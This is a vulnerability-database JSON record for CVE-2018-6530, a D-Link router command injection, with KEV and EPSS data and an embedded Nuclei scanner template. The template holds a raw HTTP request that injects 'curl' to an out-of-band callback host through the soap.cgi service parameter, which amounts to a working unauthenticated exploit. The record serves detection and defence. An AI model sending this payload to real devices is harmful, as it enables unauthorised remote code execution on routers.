{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-6530/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-6530/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-6530/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-6530/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-6530/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-6530"},"sightings":{"href":"/api/v1/sightings/cve-2018-6530"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.96682,"kev":true,"percentile":0.99883},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-6530.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-6530\n\ninfo:\n  name: D-Link - Unauthenticated Remote Code Execution\n  author: gy741\n  severity: critical\n  description: |\n    OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.\n  remediation: |\n    Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-6530\n    - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\n    - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf\n    - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-6530\n    cwe-id: CWE-78\n    epss-score: 0.96682\n    epss-percentile: 0.99884\n    cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dlink\n    product: dir-860l_firmware\n  tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: identity\n        SOAPAction: \"whatever-serviceType#whatever-action\"\n        Content-Type: text/xml\n\n        whatever-content\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: curl\"\n# digest: 490a004630440220706a245cd654b89d17d5af8a6b0a04cc4405f31de4aee94dbb6e1ef84c1633e702206e9869827e15b0db114264c318af9669579af496ff4295bb3b0257b14f5e760b:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-6530"}